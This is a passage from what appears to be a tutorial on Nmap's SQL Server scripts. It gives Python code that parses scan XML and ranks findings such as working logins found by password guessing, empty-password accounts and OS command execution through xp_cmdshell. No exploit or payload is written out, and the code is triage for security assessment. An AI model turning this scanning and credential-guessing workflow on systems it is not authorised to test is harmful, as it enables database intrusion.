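    severity: str
    detail: str


# One rule per kind of line the chapter's scripts print; the first match wins.
LINE_RULES = [
    (re.compile(r"Valid credentials|Login Success"), "critical", "working database login"),
    (re.compile(r"has empty password"), "critical", "account without a password"),
    (re.compile(r"Account locked"), "warning", "locked account (guessing may have caused it)"),
    (re.compile(r"=> FAIL$"), "high", "CIS check failed"),
    (re.compile(r"=> REVIEW$"), "info", "CIS check needs manual review"),
]


def triage(xml_text: str) -> List[Finding]:
    """Turn every interesting script output line into a Finding."""
    findings: List[Finding] = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr", "")
        for port in host.iter("port"):
            portid = int(port.get("portid", "0"))
            for script in port.findall("script"):
                sid = script.get("id", "")
                output = script.get("output", "")
                if sid == "ms-sql-xp-cmdshell" and output.strip():
                    # Any command output at all means OS-level code execution.
                    findings.append(Finding(addr, portid, sid, "critical",
                                            "OS command executed through xp_cmdshell"))
                    continue
                for line in (raw.strip() for raw in output.splitlines()):
                    for pattern, severity, label in LINE_RULES:
                        if line and pattern.search(line):
                            findings.append(Finding(addr, portid, sid, severity, f"{label}: {line}"))
                            break
    return findings


def worst_by_host(findings: List[Finding]) -> Dict[str, str]:
    """Map each host to its most severe finding for a one-line summary."""
    worst: Dict[str, str] = {}
    for f in findings:
        current = worst.get(f.host)
        if current is None or SEVERITY_ORDER.index(f.severity) < SEVERITY_ORDER.index(current):
            worst[f.host] = f.severity
    return worst


if __name__ == "__main__":
    found = triage(SAMPLE_XML)
    for f in sorted(found, key=lambda f: (f.host, f.port, SEVERITY_ORDER.index(f.severity))):
        print(f"{f.host}:{f.port} {f.script:<22} {f.severity:<8} {f.detail}")
    print(worst_by_host(found))
```

Matching on the printed text rather than on the structured <table>/<elem> children is a deliberate trade: it is slightly looser, but it works unchanged across the scripts in this chapter and across Nmap versions that changed their structured output, and the rule table is the only thing to extend when a new script is added to the scan.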